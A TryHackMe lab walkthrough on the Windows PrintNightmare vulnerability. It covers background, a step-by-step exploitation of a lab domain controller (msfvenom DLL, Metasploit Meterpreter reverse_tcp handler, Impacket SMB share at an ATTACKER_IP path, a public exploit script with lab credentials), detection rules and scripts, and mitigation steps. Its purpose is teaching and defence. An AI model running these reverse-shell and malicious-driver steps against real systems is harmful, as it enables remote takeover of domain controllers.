PrintNightmare
Room Link: https://tryhackme.com/r/room/printnightmarehpzqlp8
Microsoft defines the Print spooler service as a service that runs on each computer system. As you can guess from the name, the Print spooler service manages the printing processes. The Print spooler's responsibilities are managing the print jobs, receiving files to be printed, queueing them, and scheduling.
You are able to Start/Stop/Pause/Resume the Print Spooler Service by simply navigating to Services on your Windows system.
Services:
Print Spooler Properties (Services):
Print spooler service makes sure to provide enough resources to the computers that send out the print jobs. Remember the early days when users had to wait for print jobs to finish to perform other operations? Well, the Print spooler service took care of this issue for us.
The Print spooler service allows the systems to act as print clients, administrative clients, or print servers. It is also important to note that the Print spooler service is enabled by default in all Windows clients and servers. It's necessary to have a Print spooler service on the computer to connect to a printer. There are third-party software and drivers provided by the printer manufacturers that would not require you to have the Print spooler service enabled. Still, most companies prefer to utilize Print spooler services.
Domain Controllers mainly use Print spooler service for printer pruning (the process of removing the printers that are not in use anymore on the network and have been added as objects to Active Directory). Printer pruning eliminates the issue for the users reaching out to a non-existent printer. You will know soon why we mentioned Domain Controllers.
To better understand the PrintNightmare vulnerability (or any vulnerability), you should get into the habit of researching the vulnerabilities by reading Microsoft articles on any Windows-specific CVE or browsing through the Internet for community and vendor blogposts.
There has been some confusion about whether CVE-2021-1675 and CVE-2021-34527 are related to each other. They go under the same name, "Windows Print Spooler Remote Code Execution Vulnerability", and both concern the Print Spooler.
As Microsoft states in the FAQ, the PrintNightmare (CVE-2021-34527) vulnerability "is similar but distinct from the vulnerability that is assigned CVE-2021-1675. The attack vector is different as well."
What did Microsoft mean by the attack vector? To answer this question, let's look into the differences between the two vulnerabilities and append the timeline of events.
Per Microsoft's definition, the PrintNightmare vulnerability is "a remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights."
Running arbitrary code means executing any commands of the attacker's choice on a victim's machine. If you look at both CVEs on Microsoft's site, you will notice that the attack vectors differ.
To exploit the CVE-2021-1675 vulnerability, the attacker would need to have direct or local access to the machine to use a malicious DLL file to escalate privileges. To exploit the CVE-2021-34527 vulnerability successfully, the attacker can remotely inject the malicious DLL file.
Vulnerability metrics for CVE-2021-1675:
Vulnerability metrics for CVE-2021-34527:
Timeline:
June 8, 2021: Microsoft issued a patch for a privilege escalation vulnerability in the print spooler service (CVE-2021-1675).
June 21, 2021: Microsoft revised the vulnerability and changed its classification to remote code execution (RCE).
June 27, 2021: Chinese cybersecurity firm QiAnXin published a video demonstrating local privilege escalation (LPE) and RCE.
July 2, 2021: Microsoft assigns a new CVE to the so-called PrintNightmare vulnerability in the print spooler service (CVE-2021-34527).
July 6, 2021: Microsoft released an out-of-band patch (a patch released at some time other than the normal release time) to address CVE-2021-34527 and provides additional workarounds to defend against the exploit.
What makes PrintNightmare dangerous?
It can be exploited over the network; the attacker doesn't need direct access to the machine.
The proof-of-concept was made public on the Internet.
The Print Spooler service is enabled by DEFAULT on domain controllers and workstations, and it runs with SYSTEM privileges.
To understand how the attack works and what logs and events are generated, you need to put the Black Hat on and run the attack on your own. But, of course, it requires permission from management to perform this attack in your employer's environment, even if it's an isolated environment.
Fret not, you can perform the attack against the attached virtual machine and not in your employer's environment.
Follow the steps outlined below to exploit the Domain Controller using the Attack Box by exploiting the PrintNightmare vulnerability.
In the sample terminal output below, the victim is 10.10.57.176, and the attacker is 192.168.0.100.
Note: As a subscriber, launch the Attack Box if you haven't done so before proceeding. As a free user, this task should be completed on your local attacking machine.
Before proceeding, create 2 directories on the Desktop:
pn - this will contain the exploit.
share - this directory (/root/Desktop/share) will contain the malicious DLL that will be created with msfvenom.
Download CVE-2021-1675.py:
Clone the CVE-2021-1675 exploit from GitHub
Before spinning up Metasploit, create the malicious DLL.
Note: In the terminal outputs below the attacker is 192.168.0.100. You will need to replace 192.168.0.100 with your ATTACK BOX IP (or OpenVPN IP).
You will use msfvenom to create the malicious DLL.
Create the malicious DLL with msfvenom
If you see a similar output when you run this command, then you should have successfully created the DLL.
Let's fire up Metasploit.
Once Metasploit successfully loads, you need to configure the handler to receive the incoming connection from the malicious DLL.
Run the following commands:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost VALUE
set lport VALUE
Note: The value for LHOST and LPORT must be the same values you used to create the malicious DLL.
Configure a Metasploit listener
Next, run it so it will be actively waiting for a connection.
Start the listener to accept incoming connections
The -j flag simply means to run it as a job.
Great, now you'll need to host the malicious DLL in an SMB share running on the attacker box. We'll use the AttackBox in this example.
Below is how to do this with smbserver.py from Impacket.
Start the SMB share with Impacket to host the malicious DLL
A brief explanation for the command in the above image:
share - the name of the SMB share used in the exploit command. (Example: \\ATTACKER_IP\share\malicious.dll)
/root/Desktop/share - the local folder that stores the malicious DLL. (Example: /root/Desktop/share/malicious.dll)
Before we blindly just execute an exploit at the target, let's first examine if the target fits the criteria to exploit it.
Yep, looks good. It's finally time to run the exploit. Navigate to the location where you downloaded the exploit code from GitHub, which should be /root/Desktop/pn/CVE-2021-1675.
We will use the Python script to exploit the PrintNightmare vulnerability against the Windows 2019 Domain Controller.
A brief explanation for the command in the above image:
python3.9 CVE-2021-1675.py -> you're instructing Python to run the following Python script. The values which follow are the parameters the script needs to exploit the PrintNightmare vulnerability successfully.
Finance-01.THMdepartment.local -> the name of the domain controller (Finance-01) along with the name of the domain (THMdepartment.local)
sjohnston:mindheartbeauty76@10.10.57.176 -> the username and password for the low privilege Windows user account.
\\ATTACKER_IP_ADDRESS\share\malicious.dll -> the location to the SMB path storing the malicious DLL.
If all goes well, you should see an output similar to the below image.
You may see Python errors after Try 3... but they are safe to ignore.
Victim connects to the SMB share for the malicious DLL
Lastly, you will have a successful Meterpreter session.
Let's imagine the worst-case scenario that the THMdepartment was compromised a couple of days after the PoC for PrintNightmare was released, and you are THMdepartment's Threat Hunter. Your company suspects that an attacker used PrintNightmare to access the Domain Controller, and your task is to find evidence or indicators of compromise. So, the next question would be what indicators should you look for in order to detect the PrintNightmare attack?
The attacker would most likely use rpcdump.py to scan for vulnerable hosts. After finding a vulnerable print server, the attacker can execute the exploit code (similar to the Python script in the previous task), which loads the malicious DLL file to exploit the vulnerability. More specifically, the exploit code calls the RpcAddPrinterDriverEx() function from the authenticated user account and passes it the malicious DLL. RpcAddPrinterDriverEx() is the legitimate call used to install a printer driver on the system, which is why the abuse is not obvious at first glance.
Sygnia shared some advanced threat hunting tips to detect PrintNightmare. When hunting for PrintNightmare, you should look for the following:
Search for the spoolsv.exe process launching rundll32.exe as a child process without any command-line arguments.
Considering the usage of the RpcAddPrinterDriverEx() function, you will mostly find the malicious DLL dropped into the %WINDIR%\system32\spool\drivers\x64\3\ folder, along with DLLs that were loaded afterward from %WINDIR%\system32\spool\drivers\x64\3\Old\ (you should proactively monitor these folders for any unusual DLLs).
Hunt for suspicious spoolsv.exe child processes (cmd.exe, powershell.exe, etc.).
The attacker might even use Mimikatz to perform the attack; in this case, a print driver named ‘QMS 810’ will be created. This can be detected by logging registry changes (e.g., Sysmon Event ID 13).
Search for DLLs that are part of the proof-of-concept codes that were made public, such as MyExploit.dll, evil.dll, addCube.dll, rev.dll, rev2.dll, main64.dll, mimilib.dll. If they're present on the endpoint, you can find them with Event ID 808 in Microsoft-Windows-PrintService.
Splunk also did a great job of providing us with some detection search queries:
Identifies Print Spooler adding a new Printer Driver:
Detects spoolsv.exe with a child process of rundll32.exe:
Suspicious rundll32.exe instances without any command-line arguments:
Detects when a new printer plug-in has failed to load:
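The process-tree hunting tips above can be expressed as a handful of rules and run over endpoint telemetry. The following is an added example, not code from the TryHackMe room, Sygnia or Splunk: it encodes four of the rules (spoolsv.exe spawning rundll32.exe with no arguments, rundll32.exe with no arguments from any parent, spoolsv.exe spawning a shell, and a registry write mentioning a 'QMS 810' driver) over constructed records whose keys mirror Sysmon Event ID 1 and 13 fields. The sample events, including the registry path assumed for the driver entry, are made up for the demonstration.

```python
"""Process-tree hunting rules for PrintNightmare, run over constructed Sysmon records.

Added example, not code from the TryHackMe room, Sygnia or Splunk. Input records are
dicts whose keys mirror Sysmon event data fields (EventID, Image, ParentImage,
CommandLine, TargetObject). SAMPLE_EVENTS is constructed for the demonstration.
"""
import shlex
from collections import defaultdict

SPOOLER = "spoolsv.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}


def basename(path):
    """Case-folded file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def has_arguments(command_line):
    """True when the command line carries anything beyond the executable itself.
    Non-POSIX splitting keeps backslashes literal and honours quoted paths."""
    try:
        tokens = shlex.split(command_line, posix=False)
    except ValueError:  # unbalanced quotes: fall back to a plain whitespace split
        tokens = command_line.split()
    return len(tokens) > 1


def hunt(events):
    """Return {rule_name: [RecordID, ...]} for every record a rule matches."""
    hits = defaultdict(list)
    for ev in events:
        rid = ev["RecordID"]
        if ev["EventID"] == 1:  # Sysmon ProcessCreate
            image = basename(ev["Image"])
            parent = basename(ev["ParentImage"])
            no_args = not has_arguments(ev["CommandLine"])
            if parent == SPOOLER and image == "rundll32.exe" and no_args:
                hits["spoolsv_rundll32_noargs"].append(rid)
            if image == "rundll32.exe" and no_args:
                hits["rundll32_noargs"].append(rid)  # lower confidence on its own
            if parent == SPOOLER and image in SHELLS:
                hits["spoolsv_shell_child"].append(rid)
        elif ev["EventID"] == 13:  # Sysmon RegistryEvent (value set)
            if "qms 810" in ev["TargetObject"].lower():
                hits["qms810_driver_registry"].append(rid)
    return dict(hits)


# Constructed sample: two spooler-spawned processes, one Mimikatz-style driver
# registration (registry path is an assumption), and two records that must not
# fire the spooler-parent rules.
SAMPLE_EVENTS = [
    {"RecordID": 101, "EventID": 1, "ParentImage": r"C:\Windows\System32\spoolsv.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"C:\Windows\System32\rundll32.exe"},
    {"RecordID": 102, "EventID": 1, "ParentImage": r"C:\Windows\System32\spoolsv.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"RecordID": 103, "EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL'},
    {"RecordID": 104, "EventID": 13, "Image": r"C:\Windows\System32\spoolsv.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Print\Environments"
                     r"\Windows x64\Drivers\Version-3\QMS 810\Configuration File"},
    {"RecordID": 105, "EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe"'},
]

if __name__ == "__main__":
    for rule, ids in sorted(hunt(SAMPLE_EVENTS).items()):
        print(f"{rule:28s} records {ids}")
```

Record 101 fires both rundll32 rules while 105 fires only the weaker one; in practice the spoolsv.exe-parent match is the one worth paging on, and the parentless variant is a pivot for wider triage.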
Windows Event Logs are detailed records of security, system, and application notifications created by the Windows operating system. Some logs record events related to Print Spooler activity. Still, they might not be enabled by default and may need to be configured using Windows Group Policy or PowerShell.
The logs related to Print Spooler Activity are:
Microsoft-Windows-PrintService/Admin
Microsoft-Windows-PrintService/Operational
We can detect the PrintNightmare artifacts by looking at the endpoint events or Windows Event Logs mentioned above.
You can look for the following Event IDs:
Microsoft-Windows-PrintService/Operational (Event ID 316) - look for "Printer driver [file] for Windows x64 Version-3 was added or updated. Files:- UNIDRV.DLL, AddUser.dll, AddUser.dll. No user action is required."
Microsoft-Windows-PrintService/Admin (Event ID 808) - A security event source has attempted to register (can detect unsigned drivers and malicious DLLs loaded by spoolsv.exe)
Microsoft-Windows-PrintService/Operational (Event ID 811) - Logs the information regarding failed operations. The event will provide information about the full path of the dropped DLL.
Microsoft-Windows-SMBClient/Security (Event ID 31017) - This Event ID can also be used to detect unsigned drivers loaded by spoolsv.exe.
Windows System (Event ID 7031) - Service Stop Operations (This event ID will show you unexpected termination of print spooler service).
You can also use Sysmon to detect PrintNightmare terror:
Microsoft-Windows-Sysmon/Operational (Event ID 3) - Network connection (Look for suspicious ports)
Microsoft-Windows-Sysmon/Operational (Event ID 11) - FileCreate (File creation events are being logged, you can look for loaded DLLs in the Print Spooler’s driver directory: C:\Windows\System32\spool\drivers\x64\3)
Microsoft-Windows-Sysmon/Operational (Event IDs 23, 26) - FileDelete (You can hunt for deleted malicious DLLs)
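The event IDs listed above are most useful when read together: a 316 whose file list names a DLL that is not part of a stock driver package, a Sysmon 11 for that same DLL landing in the spool driver directory, an 808 load failure carrying its error code, an outbound connection from spoolsv.exe to a non-printing port, and finally a 7031 as the spooler crashes. The following is an added example, not code from the TryHackMe room: the channel names and event IDs are the real ones, but the records are constructed, and the 808 message layout, the baseline file list, the port list and the file and host values are assumptions made for the demonstration.

```python
"""Triage of Print Spooler event-log artifacts for a PrintNightmare-style driver install.

Added example, not code from the TryHackMe room. Channel names and event IDs are real;
the records in SAMPLE_EVENTS, the 808 message layout, the driver-file baseline and the
port list are assumptions constructed for the demonstration.
"""
import re
from collections import defaultdict

DRIVER_DIR = "c:\\windows\\system32\\spool\\drivers\\x64\\3\\"
# Files a stock Microsoft driver package installs (assumed baseline); other DLLs in a
# 316 file list deserve a look.
BASELINE_DRIVER_FILES = {"unidrv.dll", "unidrvui.dll", "unires.dll", "pscript5.dll", "ps5ui.dll"}
# DLL names used by public proof-of-concept code, taken from the hunting tips above.
POC_DLL_NAMES = {"myexploit.dll", "evil.dll", "addcube.dll", "rev.dll", "rev2.dll",
                 "main64.dll", "mimilib.dll"}
# Ports spoolsv.exe reaches legitimately (raw, LPD and IPP printing, SMB print servers).
PRINTING_PORTS = {9100, 515, 631, 445}

FILES_316 = re.compile(r"Files:-\s*(.+?)\.\s*No user action", re.S)
PLUGIN_808 = re.compile(r"plug-in module (.+?), error code (0x[0-9A-Fa-f]+)")


def files_from_316(message):
    """Extract the comma-separated file list from a 316 'driver added or updated' message."""
    m = FILES_316.search(message)
    return [f.strip().lower() for f in m.group(1).split(",") if f.strip()] if m else []


def unknown_dlls(files):
    """DLLs in a 316 file list that are not part of the assumed baseline."""
    return sorted({f for f in files if f.endswith(".dll") and f not in BASELINE_DRIVER_FILES})


def triage(events):
    """Return {finding: [details...]}; each detail starts with the RecordID to pivot on."""
    hits = defaultdict(list)
    for ev in events:
        rid, ch, eid = ev["RecordID"], ev["Channel"], ev["EventID"]
        if ch == "Microsoft-Windows-PrintService/Operational" and eid == 316:
            bad = unknown_dlls(files_from_316(ev["Message"]))
            if bad:
                hits["driver_added_unknown_dll"].append((rid, bad))
        elif ch == "Microsoft-Windows-PrintService/Admin" and eid == 808:
            m = PLUGIN_808.search(ev["Message"])
            if m:  # dropped DLL path and the error code the question above asks for
                hits["plugin_load_failed"].append((rid, m.group(1).lower(), m.group(2).lower()))
        elif ch == "Microsoft-Windows-Sysmon/Operational" and eid == 11:
            target = ev["TargetFilename"].lower()
            if target.startswith(DRIVER_DIR) and target.endswith(".dll"):
                name = target.rsplit("\\", 1)[-1]
                hits["dll_dropped_in_driver_dir"].append((rid, name, name in POC_DLL_NAMES))
        elif ch == "Microsoft-Windows-Sysmon/Operational" and eid == 3:
            proc = ev["Image"].lower().rsplit("\\", 1)[-1]
            if proc in ("spoolsv.exe", "rundll32.exe") and ev["DestinationPort"] not in PRINTING_PORTS:
                hits["spooler_unusual_outbound"].append(
                    (rid, proc, ev["DestinationIp"], ev["DestinationPort"]))
        elif ch == "System" and eid == 7031 and "print spooler" in ev["Message"].lower():
            hits["spooler_terminated_unexpectedly"].append(rid)
    return dict(hits)


# Constructed sample: one benign driver install, then the chain an attack would leave.
SAMPLE_EVENTS = [
    {"RecordID": 1, "Channel": "Microsoft-Windows-PrintService/Operational", "EventID": 316,
     "Message": "Printer driver Generic / Text Only for Windows x64 Version-3 was added or "
                "updated. Files:- UNIDRV.DLL, UNIDRVUI.DLL, UNIRES.DLL. No user action is required."},
    {"RecordID": 2, "Channel": "Microsoft-Windows-PrintService/Operational", "EventID": 316,
     "Message": "Printer driver 1234 for Windows x64 Version-3 was added or updated. "
                "Files:- UNIDRV.DLL, evil.dll, evil.dll. No user action is required."},
    {"RecordID": 3, "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 11,
     "TargetFilename": r"C:\Windows\System32\spool\drivers\x64\3\evil.dll"},
    {"RecordID": 4, "Channel": "Microsoft-Windows-PrintService/Admin", "EventID": 808,
     "Message": r"The print spooler failed to load a plug-in module "
                r"C:\Windows\system32\spool\DRIVERS\x64\3\evil.dll, error code 0x7e."},
    {"RecordID": 5, "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 3,
     "Image": r"C:\Windows\System32\spoolsv.exe", "DestinationIp": "192.0.2.10", "DestinationPort": 9100},
    {"RecordID": 6, "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 3,
     "Image": r"C:\Windows\System32\spoolsv.exe", "DestinationIp": "192.0.2.99", "DestinationPort": 4444},
    {"RecordID": 7, "Channel": "System", "EventID": 7031,
     "Message": "The Print Spooler service terminated unexpectedly. It has done this 1 time(s)."},
]

if __name__ == "__main__":
    for finding, details in triage(SAMPLE_EVENTS).items():
        print(f"{finding}: {details}")
```

The baseline approach matters more than the PoC name list: the same DLL appearing in a 316 file list, a Sysmon 11 under drivers\x64\3 and an 808 load failure within seconds is the signal, whatever the file is called.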
You are still in the middle of hunting for THMDepartment to determine if the PrintNightmare attack actually took place. Armed with all the knowledge above, can you detect the PrintNightmare artifacts in the Event Logs?
Add the following filters
Event Level
Event Logs
Event IDs
Provide the name of the dropped DLL, including the error code. (no space after the comma)
Provide the event log name and the event ID that detected the dropped DLL. (no space after the comma)
Find the source name and the event ID when the Print Spooler Service stopped unexpectedly and how many times was this event logged? (format: answer,answer,answer)
After some threat hunting steps, you are more confident now that it's a PrintNightmare attack. Hunt for the attacker's shell connection. Provide the log name, event ID, and destination port. (format: answer,answer,answer)
Find...
Oh no! You think you've found the attacker's connection. You need to know the attacker's IP address and the destination hostname in order to terminate the connection. Provide the attacker's IP address and the hostname. (format: answer,answer)
A Sysmon FileCreated event was generated and logged. Provide the full path to the dropped DLL and the earliest creation time in UTC. (format:answer,yyyy-mm-dd hh-mm-ss)
Find...
Packet captures (pcap) play a crucial role in detecting signs of compromise.
If you are not familiar with Wireshark, no worries. You can learn more about Wireshark and how to analyze the packet captures by joining the Wireshark 101 room. It will be a lot of fun!
Detecting the PrintNightmare attack (CVE-2021-1675 and CVE-2021-34527) by analyzing network traffic is not as easy as inspecting artifacts like Windows Event Logs on the victim's machine. The attacker relies on adding a printer driver using the DCE/RPC calls RpcAddPrinterDriver or RpcAddPrinterDriverEx.
DCE/RPC stands for Distributed Computing Environment/Remote Procedure Calls; it is the remote procedure call standard that defines both the programming interfaces and the over-the-network protocol. What makes detection harder is that there are legitimate uses of RpcAddPrinterDriver and RpcAddPrinterDriverEx, so network traffic analysis alone cannot make you confident that a PrintNightmare attack occurred in your environment. According to Corelight, detection gets even harder if the exploit wraps the DCE/RPC calls in SMB3 encryption: to identify the encrypted DCE/RPC calls, you would first need to decrypt and decode the payloads, which is a time-consuming task.
Corelight also released a Zeek package that detects the printer driver additions over DCE/RPC commands that are not encrypted.
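A simplified version of what such a package does, written here as an added example and not Corelight's code or anything from the TryHackMe room: read Zeek's tab-separated dce_rpc.log, keep spoolss calls whose operation is RpcAddPrinterDriver or RpcAddPrinterDriverEx, and report them per client host, with an allow-list for the hosts that legitimately push drivers. The log excerpt is constructed (the IPs reuse the room's attacker and victim addresses) and the column names follow Zeek's dce_rpc.log. The caveat from the paragraph above applies directly: calls carried inside SMB3 encryption never produce a dce_rpc.log line, so an empty result is not evidence that no driver was added.

```python
"""Flag printer-driver additions over DCE/RPC in a Zeek dce_rpc.log.

Added example, not Corelight's Zeek package or code from the TryHackMe room.
SAMPLE_LOG is constructed; field names follow Zeek's dce_rpc.log header.
"""
from collections import defaultdict

# The two spoolss operations the page identifies as the driver-install path.
DRIVER_ADD_OPS = {"RpcAddPrinterDriver", "RpcAddPrinterDriverEx"}


def parse_zeek_log(text):
    """Yield one dict per record, keyed by the names in the '#fields' header line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split("\t")))


def driver_additions(text, allowed_clients=frozenset()):
    """Return {client_ip: [(ts, server_ip, operation), ...]} for spoolss driver-add
    calls from clients that are not on the allow-list of known print admin hosts."""
    hits = defaultdict(list)
    for rec in parse_zeek_log(text):
        if rec.get("endpoint") != "spoolss" or rec.get("operation") not in DRIVER_ADD_OPS:
            continue
        client = rec["id.orig_h"]
        if client in allowed_clients:
            continue
        hits[client].append((rec["ts"], rec["id.resp_h"], rec["operation"]))
    return dict(hits)


# Constructed excerpt: an enumeration call, three driver additions from two clients,
# and an unrelated lsarpc call that must be ignored. Encrypted SMB3 sessions would
# simply be absent from this log.
SAMPLE_LOG = """#separator \\x09
#set_separator\t,
#path\tdce_rpc
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\trtt\tnamed_pipe\tendpoint\toperation
#types\ttime\tstring\taddr\tport\taddr\tport\tinterval\tstring\tstring\tstring
1625580000.100000\tC1\t192.168.0.100\t49821\t10.10.57.176\t445\t0.002\t\\\\pipe\\spoolss\tspoolss\tRpcEnumPrinterDrivers
1625580000.200000\tC1\t192.168.0.100\t49821\t10.10.57.176\t445\t0.003\t\\\\pipe\\spoolss\tspoolss\tRpcAddPrinterDriverEx
1625580000.300000\tC1\t192.168.0.100\t49821\t10.10.57.176\t445\t0.003\t\\\\pipe\\spoolss\tspoolss\tRpcAddPrinterDriverEx
1625580100.000000\tC2\t10.10.10.5\t50112\t10.10.57.176\t445\t0.001\t\\\\pipe\\spoolss\tspoolss\tRpcAddPrinterDriverEx
1625580200.000000\tC3\t10.10.10.20\t50200\t10.10.57.176\t445\t0.001\t\\\\pipe\\lsass\tlsarpc\tLsarOpenPolicy2
"""

if __name__ == "__main__":
    # 10.10.10.5 stands in for a print-management host that is allowed to add drivers.
    for client, calls in driver_additions(SAMPLE_LOG, {"10.10.10.5"}).items():
        print(f"{client}: {len(calls)} driver-add call(s) -> {sorted({c[1] for c in calls})}")
```

Two consecutive RpcAddPrinterDriverEx calls from one client to a domain controller, as in the sample, is the pattern worth correlating with the 316 and 808 events on the host; a single call from a known print-management server is routine.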
Attached to this task is a PCAP from a PrintNightmare attack you can download and open in your local Wireshark instance.
Task: Inspect the PCAP and answer the questions below.
What is the host name of the domain controller?
What is the local domain?
What user account was utilized to exploit the vulnerability?
What was the malicious DLL used in the exploit?
What was the attacker's IP address?
What was the UNC path where the malicious DLL was hosted?
There are encrypted packets in the results. What was the associated protocol?
It was not just a nightmare, and now you are 100% confident that it was a PrintNightmare attack on THMDepartment. You checked the other domain controllers on your network, and it appears that they are clean.
It is not the end of the world just yet. You can still mitigate or defend against the attack by disabling the Print Spooler on all domain controllers and modifying the registry settings (if applicable). How can you do it?
Microsoft provided the steps to detect whether the Print Spooler service is enabled and how to disable it:
First, you need to determine if the Print Spooler service is running.
Run the following in Windows PowerShell (Run as administrator):
Get-Service -Name Spooler
If Print Spooler is running or if the service is not set to disabled, then select one of the options below to either disable the Print Spooler service or to Disable inbound remote printing through Group Policy.
Option 1) Disable the Print Spooler service:
If disabling the Print Spooler service is appropriate for your environment, use the following PowerShell commands:
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
NOTE: By disabling the Print Spooler service, you remove the ability to print locally and remotely.
Option 2) Disable inbound remote printing through Group Policy:
The settings via Group Policy can be configured as follows:
Computer Configuration / Administrative Templates / Printers
Disable the “Allow Print Spooler to accept client connections” policy to block remote attacks.
This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer operate as a print server, but local printing to a directly attached device will still work.
Note: Remember that for the group policy to take effect across the domain, or even on the local machine, you need to issue a gpupdate /force command.
For more information, see: Use Group Policy settings to control printers.
The security update for Windows Server 2012, Windows Server 2016, and Windows 10, Version 1607 was released by Microsoft on July 7, 2021.
Additional steps for mitigation besides installing the updates recommended by Microsoft:
Confirm that the following registry values are set to 0 (zero) or are not defined (note: these registry values do not exist by default, so a system where they are absent is already at the secure setting), and check that your Group Policy settings are correct (see the FAQ):
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint
NoWarningNoElevationOnInstall = 0 (DWORD) or not defined (default setting)
UpdatePromptSettings = 0 (DWORD) or not defined (default setting)
Note: Having NoWarningNoElevationOnInstall set to 1 makes your system vulnerable by design.